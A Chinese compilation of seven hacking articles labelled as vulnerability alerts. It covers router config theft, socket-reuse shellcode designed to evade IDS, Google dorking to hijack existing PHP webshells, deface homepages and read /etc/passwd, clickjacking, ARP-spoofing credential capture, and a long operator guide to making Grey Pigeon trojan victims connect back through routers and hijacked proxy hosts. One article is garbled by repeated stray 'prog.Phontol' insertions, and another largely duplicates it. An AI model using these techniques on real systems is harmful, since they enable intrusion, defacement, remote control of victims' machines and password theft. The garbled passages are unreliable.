渗透底层路由技术漏洞预警

以下是小编帮大家整理的渗透底层路由技术漏洞预警，本文共7篇，欢迎大家收藏分享。

篇1：渗透底层路由技术漏洞预警

来源：华夏 联盟

掌握扫描底层路由可以大大方便入侵内网,如企业,公司,学校等等..若深入透彻技术可以截取敏感信息,简化了入侵过程,而获得路由特权的话，可以制为代理跳板,仿伪攻击等.可以说这是一种“高水平”的 技术手段.

首先,我们要准备的东西--“SolarWinds.Engineers.Toolset”

我们先来打开cisco Tools里的“IP Network browser”输入我们要扫描的IP段，来确定是否具有漏洞．

若是扫描出来，就会显示特殊标志的，

渗透底层路由技术漏洞预警

，

扫描出来后，我们要利用CISCOTools的ConfigDownload下载路由的config文件

点后，我们找到SelectRouter，填写好我们扫描出来的IP

下载后，一般保存在c:\tftp-root目录下，得到该文件．

总结：管理员要定期修改Secret密码,并且把明文和暗文密码要区分.和掌握最新的各类漏洞，及时更新检查．

篇2：透析 攻击技术之渗透防火墙的Shellcode漏洞预警

内容摘要

1. 远程shellcode的几种实现方式

2. 复用当前连接技术的一些问题及优势

3. Win32平台的具体实现

4. Linux x86平台的具体实现

5. AIX PowerPC平台的具体实现

实现方式简介

1. 远程shellcode的几种实现方式

1.1 监听端口

1.1.1 监听新的端口

1.1.2 重新使用原端口

1.1.2.1 端口复用

1.1.2.2 重新绑定

1.2 反向连接

1.3 复用当前连接的SOCKET

1.3.1 IIS的ECB结构

1.3.2 getpeername

1.3.3 fcntl设置socket状态

1.3.4 ioctl(Linux/Unix)和ioctlsocket(Win32)

1.3.5 使用OOB特性

1.3.6 Hook系统的recv调用

复用当前连接技术介绍

2. 复用当前连接技术的一些问题及优势

2.1 绑定shell

Unix下可以直接把SOCKET作为“/bin/sh”的输入输出句柄，在Win32下，socket函数隐式指定了重叠标志，它创建的SOCKET是重叠套接字(overlapped socket)，不能直接将cmd.exe的stdin、stdout、stderr转向到套接字上，只能用管道(pipe)来与cmd.exe进程传输数据。winsock推荐使用重叠套接字，所以实际使用尽可能用管道。WSASocket()创建的SOCKET默认是非重叠套接字，可以直接将cmd.exe的stdin、stdout、stderr转向到套接字上。

复用当前连接技术介绍

2.2 多线程环境搜索SOCKET

-=-=-=-=-=- start sample code =-=-=-=-=-=-=

s = WSASocket(2,1,...)

bind(s,..)

listen(s,...)

s2 = accept(s,....)

-=-=-=-=-=- end sample code =-=-=-=-=-=-

当s处于accept状态时，任何对s操作的网络函数都会处于等待状态，直到有连接建立。先用WaitForSingleObjectEx处理句柄，当s处于accept状态时会返回WAIT_TIMEOUT，可用的句柄返回WAIT_OBJECT_0.然后再用ioctlsocket/recv处理判断是否当前连接的socket.

复用当前连接技术介绍

2.3 优势

复用当前连接的技术相对较隐蔽，而且对于Win32的用管道绑定cmd.exe后，和服务器交互的数据可以用xor的办法进行编码，进一步躲避IDS的检测。单单查找SOCKET的shellcode可以写的相对比较短，在找到SOCKET后，可以再继续接收一段功能更复杂的shellcode到缓冲区，然后跳入执行。对于该后续shellcode就没有任何字符和长度的限制。甚至接收一个dll文件，实现更复杂的功能。

Win32平台的具体实现

3. Win32平台的具体实现

3.1 端口复用具体实现

端口复用shellcode要求服务重新绑定在0.0.0.0地址，而且不能使用SO_EXCLUSIVEADDRUSE选项。

客户端攻击的时候需要把服务端的具体IP和端口写入shellcode里面。

Shellcode里执行：

setsockopt(s, 0xFFFF, 4, &d, 4);

bind(s, &sockaddr, 0x10);

用netstat -na在服务端查看可以看到同一个端口有0.0.0.0和具体IP两个绑定着。如果服务端在NAT环境里，可能会存在问题。

Win32平台的具体实现

3.2 重新绑定原端口的实现

CreateProcess()创建一个suspend模式的进程。GetThreadContext()来获得该线程的上下文结构和寄存器信息。用VirtualAllocEx()在该进程里分配内存。把shellcode指令用WriteProcessMemory()来写入该进程刚才分配的空间。SetThreadContext()把GetThreadContext()获得的EIP修改指向VirtualAllocEx()分配的内存地址。ResumeThread()恢复suspend模式的进程。TerminateProcess(-1， 0)终止当前进程。循环绑定原来端口。

Win32平台的具体实现

3.3 getpeername查找socket

客户端在发送攻击串之前用getsockname函数获得套接字本地信息，把相应信息写入shellcode.服务端shellcode从1开始递增查找socket，并且用getpeername函数获得套接字远程信息。如果两个信息相符就认为找到socket，跳出递增循环，并且把shell绑定在这个socket上。有很大局限性，如果客户端在NAT网络环境里，客户端getsockname取得的套接字信息和服务端getpeername取得的套接字信息不一定相符，导致查找socket失败。

Win32平台的具体实现

3.4 字串匹配查找socket

客户端在发送完攻击数据包后，再发送几个字节的字符串，在服务端的shellcode对一个递增的socket值接收相应字节的字符串，然后匹配是否是当前连接的socket.这种方法避免了getpeername在NAT网络环境里的限制。多线程环境下容易处理到处于accept下的socket，一般的网络函数都会进入等待状态，直到有连接建立。flier提到WaitForSingleObjectEx处理这种处于accept的socket会返回WAIT_TIMEOUT，可用的句柄返回WAIT_OBJECT_0.

Win32平台的具体实现

3.4 字串匹配查找socket

查找流程如下：

while (1)

{

i++;

ret = WaitForSingleObjectEx(i, 10, 1);

if (ret != 0) continue;

ret = ioctlsocket(i, FIONREAD, &ul);

if (ul != 4) continue;

recv(i, buff, 4, 0);

if( *(DWORD *)buff == 'Xc0n') goto shell;

}

bkbll测试发现socket()函数创建的句柄在accept用户后有getsockname操作，那么后续WaitForSingleObjectEx返回WAIT_TIMEOUT (0x102)，

Win32平台的具体实现

3.5 Hook系统的recv调用

用VirtualProtect设置真实recv函数地址开始的5个字节为可写。把真实recv开始的指令改为跳转到新recv函数。在新的recv函数里先把这5个字节指令改回去。调用真实recv来执行系统本来的操作。再把真实recv函数地址开始的5个字节改为跳转新recv的指令。比较接收的数据是否是约定字串，如果是就绑定一个cmd.exe，否则跳到压栈的返回地址，继续系统原来的流程。这种方法能绕过rpc之类机制，也能够搜索再次连接的socket.

Win32平台的具体实现

3.6 文件上传下载功能的实现

必须要客户端和shellcode做紧密配合。上传文件需要客户端打开并读取文件发送给服务端，服务端的shellcode创建并写入该文件。下载文件需要服务端的shellcode打开读取文件发送给客户端，客户端创建并写入该文件。由于是非阻塞的连接，上传文件的时候，服务端的shellcode必须判断socket里是否还有数据可接收，如果没有就关闭句柄，执行后续流程。下载文件的时候，客户端必须判断socket里是否还有数据。select和ioctlsocket都可以实现这个功能。select的汇编实现相对复杂，ioctlsocket需要在发送缓冲块大于接收缓冲块的情况下使用。

Win32平台的具体实现

3.6 文件上传下载功能的实现

客户端和服务端shellcode可以使用一个约定的key对传输的数据做xor操作，由于用管道绑定cmd，那么交互的命令也是编码的，进一步增强隐蔽性，躲避IDS的检测。

Linux x86平台的具体实现

4. Linux x86平台的具体实现

4.1 fcntl设置socket状态

scz最早使用这种方法，基本思路如下：

while (1)

{

i++;

ldflags = fcntl(i, F_GETFL, 0);

fcntl(i, F_SETFL, oldflags | O_NONBLOCK);

read(i, buf, 4);

fcntl( i, F_SETFL, oldflags );

if (buf == 'Xc0n') goto shell;

}

Linux x86平台的具体实现

4.2 利用OOB特性

bkbll最先使用该技术。Berkeley套接口的实现OOB数据一般是不会被阻塞的，查找的流程大致如下：

while (1)

{

i++;

recv(i, buf, 1, 1);

if (buf == 'I') goto shell;

}

Unix/Linux该方法最是简单易行，而且有效。

Linux x86平台的具体实现

4.3 利用ioctl函数的一些特性

ioctl的FIONREAD可以判断句柄有多少数据可读，而且一般情况不会被阻塞。查找socket的流程大致如下：

while (1)

{

i++;

ioctl(i, FIONREAD, &ul);

if (ul != 4) continue;

read(i, buf, 4);

if (buf == 'Xc0n') goto shell;

}

Linux x86平台的具体实现

4.4 文件上传下载功能的实现

和Win32实现相似，只是Linux/Unix下似乎没有额外通过管道来绑定/bin/sh，所以shell里交互的数据无法编码处理。隐蔽性可能较差。

AIX PowerPC下具体实现

5. AIX PowerPC平台的具体实现

缓存机制

instruction cache

data cache

AIX PowerPC下具体实现

PowerPC自修改的代码按照如下的步骤：

存储修改的指令。

执行dcbst指令，强制包含有修改过的指令的高速缓存行进行存储。

执行sync指令，确保dcbst完成。

执行icbi指令，使将要存放修改后指令的指令高速缓存行无效。

执行isync指令，清除所有指令的指令管道，那些指令在高速

缓存行被设为无效之前可能早已被取走了。

现在可以运行修改后的指令了。当取这个指令时会发生指令高速缓存失败，结果就会从存储器中取得修改后的指令。

AIX PowerPC下具体实现

有些AIX是没有高速缓存管理指令。

简单的解决方法是做完自修改后执行一个系统中断，那么后面就能正确执行自修改后的指令。

实现解码shellcode，为实现复杂shellcode做好基础。

AIX PowerPC下具体实现

5.1 利用OOB特性的实现

和Linux x86的实现类似

难点：

各版本AIX的系统调用号都是不相同的，导致exploit不通用。

篇3：用google来进行“渗透测试”漏洞预警

黑暗访问者

我们今天渗透测试人员在实施攻击之前，往往会先进行信息搜集工作，而后才是漏洞确认和最终的漏洞利用、扩大战果，在这里我们现在要谈的是：

一、利用google查找被人安装了php webshell后门的主机，并测试能否使用;

二、利用google查找暴露出来的INC敏感信息.

OK，现在我们开始：

1.查找利用php webshell

我们在google的搜索框中填入：

Code:

intitle:“php shell*” “Enable stderr” filetype:php

(注: intitle―网页标题 Enable stderr―UNIX标准输出和标准错误的缩写filetype―文件类型)。搜索结果中，你能找到很多直接在机器上执行命令的web shell来。如果找到的PHPSHELL不会利用，如果你不熟悉UNIX，可以直接看看LIST，这里就不详细说了，有很多利用价值。要说明的是，我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令，都是system调用出来的函数(其实用百度及其他搜索引擎都可以，只是填写搜索的内容不同)。通过我的检测，这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:

Code:

echo “召唤” >index.jsp

在得到的

Code:

echo \

后再写上:“召唤”

现在看看首页，已经被我们改成: “召唤” 了。

我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file >index.html or echo “” >file

echo “test” >>file

这样一条条打出来，站点首页就成功被替换了。同样的也可以

Code:

uname -a;cat /etc/passwd

不过有点要注意，有些WEBSHELL程序有问题，执行不了的，比如:

***www.al3toof/card/smal ... c_html&command=

***ramsgaard/upload/shell.php

这些站的php是global register off 解决方案:

我们可以利用相关工具进行在互联网进行搜索，如果有信息被滥用，到***www.google/remove.html提交你希望删除的信息，控制搜索引擎机器人的查询.

2.搜索INC敏感信息

我们在google的搜索框中填入:

Code:

filetype:inc

我们现在搜索的是org域名的站点的INC信息(因为google屏蔽掉了搜索“COM”信息，我们还可以搜其他gov，cn，info，tw，jp，edu等等之类的)

PS:我在看许多PHP编程人员在编程时候，都喜欢把一些常写的代码或配置信息，写在一个.inc的文件中，如shared.inc、global.inc、conn.inc等等，当然这是一个很好的习惯，包括PHP 都是如此，但不知你有没有注意到这里面含一个安全隐患问题。我有一次在写一个PHP代码时，无意中写错了一句话，当我在浏览器里查看此PHP文件时，竟然发现屏幕详细的显示了我所出错的PHP文件路径及代码行。(PHP错误显示配置是开着的.此功能在PHP里是默认的!)，这就是说当我们无意写错代码(同样.inc文件也一样) 或者PHP代码解析出问题时，而PHP错误显示又是开着的，客户端的用户就会看到具体url地址的.inc文件，而.url文件如同txt文本一样，当在浏览器中浏览时，就毫无保留地显示了它的内容，而且不少站点在.inc文件写了重要的信息如用户密码之类!包括国内著名海尔公司以及嘉铃摩托公司，我之所以敢公布是因为我本人测试过，***www.haier/su ***/inc/conn.inc 暴出的数据库ID密码用客户端连不上去，网站关闭了1215，而且防火墙也过滤掉了，

INC的知识说完后，我们继续又搜索到了好多，找到一个暴露了MYSQL口令的，我们又可以用客户端登陆上去修改数据了。这里涉及到数据库的知识，我们不谈太多，关于“INC暴露敏感信息”就到这里结束吧；当然我们可以通过一些办法解决：

1，你可以专门对.inc文件进行配置，避免用户直接获取源文件。

2，当然比较好的方法是，加上并且改文件扩展名为.php（PHP可以解析的扩展名），这样客户端就不会获取源文件了。

这里，我将FreeMind绘制的图片用文本表示了。

有关Google Hack的详细信息，帮助我们分析踩点

连接符:

Code:

+    -    :      .      *      │

操作符:

Code:

“foo1 foo2”

filetype:123

site:foo

intext:foo

intitle:footitle

allinurl:foo

密码相关

Code:

：“index of”

htpasswd / passwd

filetype:xls username password email

“ws_ftp.log”

“config.php”

allinurl:admin mdb

service filetype:pwd (frontpage)

敏感信息：

Code:

“robots.tx”

“disallow:”

filetype:txt

inurl:_vti_cnf (frontpage files)

allinurl:/msadc/samples/selector/showcode.asp

allinurl:/examples/jsp/snp/snoop.jsp

allinurl:phpsysinfo

ipsec filetype:conf

intitle:“error occurred” odbc request where (select│insert)

“mydomain” nessus report

“report generated by”

结尾:

如果要拿ROOT权限就要具体问题具体分析了，不过有了SHELL权限就好提了，网上有很多根据WEBSHELL提升权限的文章大家可以参照一下。

通过google我们还可以搜索到很多有用的东西，不过是细节，要通过信息收集慢慢分析、扩大、进行入侵.这些我就不具体分析了。给大家个思路，大家慢慢研究好了到这里，这篇文章就要结束了，写这篇文章的目的是为了引起大家的关注与重视，了解新的HACK手段，了解新的防护方法，事物都有两面性，在当今Google盛行的时代，在充分利用google的同时.也应该看得更全面。

篇4：点击劫持（Clickjacking）漏洞技术内幕漏洞预警

来源:IT专家网

Clickjacking是OWASP_NYC_AppSec__Conference的一个保密的议题，以下是一些攻击的描叙：

当你访问一个恶意网站的时候，攻击者可以控制你的浏览器对一些链接的访问，这个漏洞影响到几乎所有浏览器以及所有版本的Flash等浏览器相关的第三方软件，除非你使用lynx一类的字符浏览器，

这个漏洞与JavaScript无关，即使你关闭浏览器的JavaScript功能也无能为力。事实上这是浏览器工作原理中的一个缺陷。一个恶意网站能让你在毫不知情的情况下点击任意链接，任意按钮或网站上的任意东西。

该漏洞用到DHTML，使用防frame代码可以保护你不受跨站点攻击，但攻击者仍可以强迫你点击任何链接。你所做的任何点击都被引导到恶意链接上，所以，那些Flash游戏将首当其冲，

最近国外的安全研究人员已经放出了该漏洞的攻击例子，以及部分细节，这种攻击是利用的CSS样式表的网页渲染功能配合IFRAME帧框架页进行的一种钓鱼网页攻击。这个攻击涉及网页设计相关的技巧，步骤是：

1.在第三方站点的网页先用IFRAME引入一个需要攻击的页面,将这个引入的框架页长宽设置成整个浏览窗口的大小。

2.在网页中使用一个CSS滤镜，将整个网页用白色滤镜遮蔽。

3.使用span或div设计一个层伪造一个表单提交按钮、输入框或者链接，然后利用CSS样式表设置层在网页中的位置，遮蔽住需要劫持的网页按钮、输入框或者链接。

攻击者使用这种方法可以制作钓鱼网页，诱导用户在不察觉的情况下，完成一些受攻击WEB程序的敏感操作。

漏洞危害：

攻击者可以制作一个精美的钓鱼网页，让用户在不知不觉中被控制摄像头，或完成密码修改、网银转帐等的恶意操作，给用户造成巨大的损失。

篇5：没有路由密码权限时的鸽子上线方法漏洞预警

没有路由密码权限时的鸽子上线方法：

第一步:工具--FTP――FTP主目录（随便在桌面建立一个），把下面的端口改成21.用户名可以不填.下面两个选项都打上勾.然后开启服务.完成了第一步!

第二步:自动上线设置.我内网IP是192.168.1.22.所以在FTP服务器里填上192.168.1.22 ，其它的都不用改，按前面的一样填，如果前面你填了用户名这里填上那个，prog.Phontol再更新！

第三步:配置服务端.我的是固定IP.所以这里.我填的是192.168.1.22.然后生服务端！

这就可以了。prog.Phontol

有内网路由权限时的鸽子上线方法：

1.安装希网或者花生壳等动态域名解析软件 (个人比较喜欢花生壳上线),其他配置之类的大同小异,FTP服务器里填上你的花生壳之类的域名,

2.本机架设FTP服务器，并在路由上做FTP的端口映射,映射成自己修改的ftp上线端口.

进入进路由里(在IE地址栏里输路由的IP即可)后新建个映射 ,把路由接收的端口设置为:木马反弹连接的端口;把映射到本地的端口设置为:本地服务端监听的端口.

其实还可以通过外网肉鸡上线,(原理上和路由上线没什么区别):首先让你的肉鸡运行鸽子中自带的VPORT,EXE.这样就打开了代理,默认端口是9999,如果你运气好,还可以扫描9999端口,直接用来映射, 然后把你空间里原来那个保存IP的ip.txt文件里的IP地址和端口,改成你肉鸡的IP地址和端口

接着在你的机器上,打开VPORT的连接端,连接到你的肉鸡,你需要控制的那台电脑,就会发送信号到你的外网肉鸡上,由于你已经进行了转发设置并和那台外网肉鸡建立好了连接,所以信息就转发到了你机器了.这样自然就可以上限了.

你如果还是不太明白,可以看下这个:

内网上线,一般就是二个方法,1,就是路由印射,很多教程上都教的这个方法,不过一般要求桥接模式,路由连接模式下是不行的

2,就是用一台外网的肉机来中转

你的问题还可以引升为为何灰鸽子的配置正确不能上线

在分析这个问题之前，先有必要对这个问题的前提进行判断，您真的是处于外网吗？很多人对于内网和外网的分别仅只是在CMD下输入IPCONFIG CALL命令查看自己的IP地址是否为外网，看到IP地址那一行中自己的IP为外网IP，就确认自己是外网IP，这是不正确的，当你的路由器是使用路由模式而非桥接模式时，即便你的IP地址是外网的，你实际上仍在内网中，至今我也没看到哪篇技术文章上说过能用IPCONFIG CALL的命令看出自己是否外于内网，因为这个计算机知识的初学者凭感觉和印象进行判断自己是否在内网的方是没有依据，不科学的。prog.Phontol更有甚者仅仅只是因为自己是用ADSL用户就认为自己是处于外网，这更加是没有联系的判断方法，对于自己是否处于内网外网的判断，比较权威的测试方法还是推荐NC连接测试法，使用NC工具在本机监听，命令为NC CVV CL -1234 然后再开一个CMD窗口执行NC，命令为NC CVV 你的外网IP地址 1234 如果能连接上，说明你是在外网，如果不能连接上，则是处于内网。prog.Phontol确认自己在外网后鸽子仍不能上网，从技术和非技术两个方面来分析：先说说非技术方面可能导至不能上网的原因，1，有的学员在测试灰鸽子时，是把灰鸽子和网络木马结合起来测试，就是说把鸽子做成了网马，然后通过网马来中鸽子进行测试，这中间就涉及到网马的可靠性问题，网马现在日益成为一种时效性很强的工具，基于系统漏洞而产生的网马，在系统漏洞补打上补丁后即告失效，那么你用来测试中马的计算机，是否为打过补丁的计算机呢？在测试灰鸽子时，不要急于求成和网络木马一起测试，先用排除法排除掉网络木马，减少一个出错环节，单独直接测试灰鸽子，可以直接点击运行鸽子进行测试，

prog.Phontol还有的朋友是将灰鸽子服务端和网络木马一起上传到WEB空间上进行测试，之前曾经在本地测试过网马是能运行的，空间商的服务器为了安全肯定装有杀毒软件还有的限制上传EXE后缀的文件，请先登陆一次FTP查看空间中此两个文件是否存在，是否被隔离，是否能正常的访问或下载。prog.Phontol如果是在本机上或者通过朋友机器进行测试的，应该关闭防火墙和杀毒软件，很多初学合用者，初于想试验又怕自己中马无法清除的提防心态，常常是在开着防火墙的情况下进行测试。prog.Phontol还有的朋友运行的灰鸽子服务端是经过自己或某些所谓免杀工具修改过的版本，这样的版本服务端并不能确保其可靠性，你的灰鸽子无法上线的原因很可能就是因为这个修改后的灰鸽子没有正常运行。prog.Phontol在生成服务端时，健议大家选中“服务器配置”----“安装选项”中的安装成功后自动删除安装文件，这样如果成功运行了会删除自身，服务端是否正常运行一目了然。prog.Phontol最后，如果你所测试的机器上已经中了灰鸽子，再次运行灰鸽子新的鸽子是不会上线的，所以先要确定被测试的计算机这之前是没有中过或者在之前的测试中感染过灰鸽子的。prog.Phontol下面谈谈从灰鸽子的配置技巧上造成的无法上线的常见原因：1,在“服务器配置”---“自动上线设置”这一栏中需要填入你的IP通知网页地址，你的域名或IP地址，请注意这三者是有格式区别的，在这一栏中后面的“说明”按钮中有详细的描述，网页文件前要以HTTP：//打头，如HTTP：//WWW。prog.PhontolYOUNAME。prog.PhontolCOM/IP。prog.PhontolTXT 域名解析地址和固定IP不需要，如WWW。prog.PhontolYOUNAME。prog.PhontolCOM ，192。prog.Phontol168。prog.Phontol0。prog.Phontol1,如果你的书写错误是无法被灰鸽子的连接信号访问到的,所以配置时要分清,自己到底是通过文件更新IP上线,域名印射本地IP上线,还是直接连接固定IP上线,.可能有的学员会不明白为什么书写错误会导至无法上线,可能有的思考过之后,还会进一步提出,我就算在我的域名和IP前面加上HTTP://也是能正常在IE中访问或者TELNET到的呀,为什么在配鸽子时加了HTTP://就无法上线呢?这个问题提得很好,说明经过了自己的思考,这里我来简单说明一下.为什么加了HTTP://就无法上线了.灰鸽子反连时.如果是采用的域名上线方式,灰鸽子会去PING这个域名,得到IP地址,再向这个IP地址发起连接请求,PING命令相信大家都掌握了,你可以试着执行一下PINGHTTP://WWW.YOUNAME.COM 看看是否能PING通,同样的,对IP进行连接时,,IP作为一个参数是整个被进行了连接,,如果你的IP前加了HTTP://你可以试试能否被TELNET上,这样解释大家该明白为何此处的书写错误会导至无法上线了吧.。prog.Phontol有的学员在这里把域名和空间填混也不是因为没搞清格式，而是实在分不清自己在网上申请的到底是空间还是域名，概念没有搞清楚，这里教给大家一个判断自己的申请的到底是空间还是域名的方法，你申请完成后，会得到一个网络地址，如TEST。prog.PhontolYOUNNAME。prog.PhontolCOM你FTP连接这个地址。prog.Phontol命令为 FTP TEST。prog.PhontolYOUNAME。prog.PhontolCOM，如果能登陆提示你输入密码，说明是空间，如果没有连接成功，说明是域名，原理是空间是具有存诸功能可以进行FTP上传下载的，因此能被连接，域名本身只相当于一个门牌号码，并没有空间来对应的，所以无法连接。prog.Phontol将以上原因逐一排除，灰鸽子应该就能上线了。prog.Phontol

篇6：没有路由密码权限时的鸽子上线方法漏洞预警

没有路由密码权限时的鸽子上线方法：

第一步:工具--FTP――FTP主目录（随便在桌面建立一个），把下面的端口改成21.用户名可以不填.下面两个选项都打上勾.然后开启服务.完成了第一步!

第二步:自动上线设置.我内网IP是192.168.1.22.所以在FTP服务器里填上192.168.1.22 ，其它的都不用改，按前面的一样填，如果前面你填了用户名这里填上那个，再更新！

第三步:配置服务端.我的是固定IP.所以这里.我填的是192.168.1.22.然后生服务端！

这就可以了。

有内网路由权限时的鸽子上线方法：

1.安装希网或者花生壳等动态域名解析软件 (个人比较喜欢花生壳上线),其他配置之类的大同小异,FTP服务器里填上你的花生壳之类的域名,

2.本机架设FTP服务器，并在路由上做FTP的端口映射,映射成自己修改的ftp上线端口.

进入进路由里(在IE地址栏里输路由的IP即可)后新建个映射 ,把路由接收的端口设置为:木马反弹连接的端口;把映射到本地的端口设置为:本地服务端监听的端口.

其实还可以通过外网肉鸡上线,(原理上和路由上线没什么区别):首先让你的肉鸡运行鸽子中自带的VPORT,EXE.这样就打开了代理,默认端口是9999,如果你运气好,还可以扫描9999端口,直接用来映射, 然后把你空间里原来那个保存IP的ip.txt文件里的IP地址和端口,改成你肉鸡的IP地址和端口

接着在你的机器上,打开VPORT的连接端,连接到你的肉鸡,你需要控制的那台电脑,就会发送信号到你的外网肉鸡上,由于你已经进行了转发设置并和那台外网肉鸡建立好了连接,所以信息就转发到了你机器了.这样自然就可以上限了.

篇7：无线渗透从外网到内网系列之MITM中间人攻击漏洞预警

作者：Christopher Yang『ZerOne』

（欢迎转载，转载时请注明作者及出处）

前言：最近忙得昏天暗地，却没有多少人可以分忧，所有重要的事情都要亲身力为，累啊.......终于有闲时赶快把以前的文章整理一下，本文详细内容请参考《无线网络安全攻防实战》一书，

MITM，全称为Man In The Middle，也就是通常所说的中间人攻击。顾名思义，作为中间人攻击，就是在目标主机与另一方主机（网关或服务器）进行正常连接的过程中，恶意的攻击者拦截、插入、伪造、中断数据包，达到截获对方登陆帐户及密码，伪造身份等目的。这种攻击的具体实现方式有很多，比如ARP欺骗、DNS欺骗、网络钓鱼等。

当攻击者能够通过无线网络侵入内部网络时，中间人攻击就成为一些颇具有耐心和经验的 们的首选，常和其它攻击方式配合使用。尤其是在目标网络采用交换环境时，进行中间人攻击可以使得攻击者更有效地截获内网用户的密码及隐秘信息。在BackTrack2 Linux环境下我们使用功能强大的EtterCap来实现，当然，对于一般性环境，也可以单纯使用ArpSpoof工具即可。在BackTrack2/3 Linux 环境下主要以ettercap较为出名。

EtterCap，一款以太网环境下的网络监视、拦载和记录工具，支持多种主动或被动的协议分析，比如基本的FTP、SMTP、Telnet、HTTP以及加密相关的SSH、HTTPS等，有数据插入、过滤、保持连接同步等多种功能，也有一个能支持多种嗅探模式的、强大而完整的嗅探套件，支持插件，能够检查网络环境是否是交换局域网，并且能使用主动或被动的操作系统指纹识别技术让你了解当前局域网的情况，

在BackTrack2/3 Linux的图形界面菜单里打开Ettercap。选择对应的网卡，

在Target里指定预欺骗的目标IP和网关服务器IP。下来，在Mitm栏里选择Arp poisoning，即Arp欺骗模式。

如下图黑框中可以看到， 截获到了内网用户登陆Telnet服务器的登陆帐户及对应密码。

也可以使用Wireshark来配合ARP欺骗进行，下图黑框处为成功截获到的论坛登陆帐户及对应密码。对于登陆一些没有启用SSL加密的网站时尤其应该注意。

由上可以看到在通过无线连接接入点深入内网后，对于有耐心的攻击者确实可以轻而易举地截获到几乎所有的网络连接内容，无论是论坛帐户密码还是远程服务器访问密码等，都已经变得透明。个人隐私和公司机密受到极大威胁。